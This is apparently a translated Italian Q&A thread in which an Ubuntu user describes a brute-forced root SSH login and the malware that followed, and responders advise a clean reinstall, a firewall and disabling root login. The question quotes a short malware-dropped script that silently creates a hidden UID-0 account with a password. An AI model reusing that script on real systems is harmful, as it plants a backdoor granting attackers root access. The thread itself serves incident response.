Come gestire i malware sul mio laptop?

12

Sono abbastanza certo che il mio laptop Ubuntu 13.10 sia infetto da una sorta di malware.

Ogni tanto trovo un processo / lib / sshd (di proprietà di root) in esecuzione e che consuma molta CPU. Non è il server sshd che esegue / usr / sbin / sshd.

Il binario ha le autorizzazioni --wxrw-rwt e genera e genera script nella directory / lib. Uno recente si chiama 13959730401387633604 e procede come segue

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

L'utente gusr è stato creato dal malware in modo indipendente, quindi chpasswd si blocca consumando il 100% della CPU.

Finora ho identificato che l'utente gusr è stato aggiunto ai file in / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Sembra che il malware abbia creato copie di tutti questi file con il suffisso "-". L'elenco completo dei file / etc / che sono stati modificati da root è disponibile qui .

Inoltre, il file / etc / hosts è stato modificato in questo .

Il file / lib / sshd inizia aggiungendosi alla fine del file /etc/init.d/rc.local!

Ho rimosso l'utente, rimosso i file, ucciso l'albero dei dati elaborati, modificato i miei passwor e rimosso le chiavi pubbliche ssh.

Sono consapevole di essere praticamente fregato e molto probabilmente reinstallerò l'intero sistema. Tuttavia, dal momento che accedo a molte altre macchine, sarebbe bene almeno tentare di rimuoverlo e capire come l'ho ottenuto. Qualche suggerimento su come procedere sarebbe apprezzato.

Sembra che siano entrati il ​​25 marzo con il login root forzato brutalmente. Non avevo idea che root ssh fosse abilitato di default in Ubuntu. L'ho disabilitato e ho messo denyhosts.

L'accesso era dal 59.188.247.236, apparentemente da qualche parte a Hong Kong.

Ho ricevuto il laptop da EmperorLinux e hanno abilitato l'accesso root. Se ne hai uno e stai eseguendo sshd, fai attenzione.

security  malware 
Dejan Jovanović
fonte
2
Rimuovi la tua macchina dalla rete! Adesso!
Seth,
2
E perché hai il login root abilitato? È qualcosa che non dovresti abilitare senza una buona ragione.
Seth,
@Seth Non l'ho abilitato, era attivo di default in Ubuntu. Sono sorpreso quanto te.
Dejan Jovanović
1
Vedi " Per impostazione predefinita, il demone SSH viene fornito con accessi root remoti abilitati. Normalmente Ubuntu non consente l'accesso diretto all'utente root, quindi questa impostazione non è importante. Se hai impostato una password sull'account root, questa impostazione può essere un potenziale rischio per la sicurezza, e dovrebbe essere disabilitato. "
Seth
1
Sono abbastanza certo che non lo sia Linux/Ebury. È qualcos'altro, e forse non ha un nome assegnato. Ebury non avrebbe creato un nuovo account utente e avrebbe modificato la libreria condivisa utilizzata da openssh, non rilasciata in un nuovo binario chiamato sshd.
Riking

Risposte:

11

Innanzitutto, togli quella macchina dalla rete ora!

Secondo, perché hai abilitato l'account root? Non dovresti davvero abilitare l'account di root a meno che tu non abbia un'ottima ragione per farlo.

Terzo, sì, l'unico modo per essere sicuri che tu sia pulito è fare un'installazione pulita. Si consiglia inoltre di ricominciare da capo e di non tornare a un backup, in quanto non si può mai essere sicuri quando tutto è iniziato.

Suggerisco anche di impostare un firewall nella prossima installazione e di negare tutte le connessioni in entrata: 

sudo ufw default deny incoming

e quindi consenti ssh con: 

sudo ufw allow ssh

e NON abilitare l'account root! Sicuramente assicurati che il login root ssh sia disabilitato.

Seth
fonte
4
Ho controllato l'account di root. Ho ricevuto il laptop da Emperorlinux e hanno abilitato l'account a configurarlo. Stupido.
Dejan Jovanović,
1
@ DejanJovanović È terribile!
Seth,
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.